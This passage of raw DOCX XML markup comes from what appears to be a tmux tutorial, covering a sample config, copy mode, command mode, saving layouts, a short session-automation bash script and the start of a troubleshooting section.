        </w:rPr>
        <w:t xml:space="preserve">~/.tmux.conf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C38">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C39">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example Config:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C3A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Enable mouse support</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C3B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set -g mouse on</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C3C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C3D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apply the configuration with:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C3E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux source-file ~/.tmux.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C3F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C4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41">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C42">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Advanced Features</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C43">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1070"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scrollback History</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1070"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter copy mode: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C45">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1070"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scroll: Use arrow keys or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PgUp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PgDn</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C46">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1070"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exit: Press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">q</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C47">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1070"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy and Paste</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1070"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter copy mode: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C49">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1070"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Start selection: Press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Space</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1070"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">End selection: Press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1070"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Paste: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r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1070"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Mode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1070"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Access: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ctrl+b</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, then </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1070"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example: Rename a window with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rename-window new_name</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1070"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Save Session Layout</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1070"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Save layout: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux list-windows -t session_name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C51">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1070"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Restore layout: Use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">select-layout</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C52">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scriptable Automation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Automate </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sessions in scripts for project-specific workflows.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> Example:</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> #!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C53">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux new-session -d -s my_project</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C54">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux send-keys -t my_project "cd ~/project &amp;&amp; vim" C-m</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C55">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux split-window -h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C56">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux send-keys "htop" C-m</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C57">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux attach-session -t my_project</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C58">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C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5A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C5B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C5C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lost session</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmux ls</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to check if the session exists.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003C5D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="184"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pane resizing issues</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
